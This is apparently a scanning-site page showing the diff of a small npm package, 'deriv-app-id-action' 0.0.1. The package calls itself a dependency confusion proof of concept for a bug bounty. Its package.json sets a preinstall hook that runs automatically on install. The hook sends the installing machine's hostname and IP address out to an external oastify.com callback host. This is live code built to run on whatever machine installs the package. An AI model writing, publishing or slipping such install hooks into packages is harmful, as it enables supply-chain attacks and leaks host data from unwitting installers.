deriv-app-id-action 0.0.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +12 -0
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "deriv-app-id-action",
3
+ "version": "0.0.1",
4
+ "description": "Fake package for dependency confusion PoC with safe pingback",
5
+ "author": "Bug Bounty PoC",
6
+ "scripts": {
7
+ "preinstall": "node -e \"require('http').get('http://$(hostname)-$(hostname -I | awk '{print $1}').zruldtbrixy9n711t512t4zi89e02xqm.oastify.com/pingback', (res) => { res.on('data', (chunk) => { console.log('Ping sent to server'); }); }).on('error', (err) => { console.error('Ping failed:', err.message); });\""
8
+ },
9
+ "publishConfig": {
10
+ "access": "public"
11
+ }
12
+ }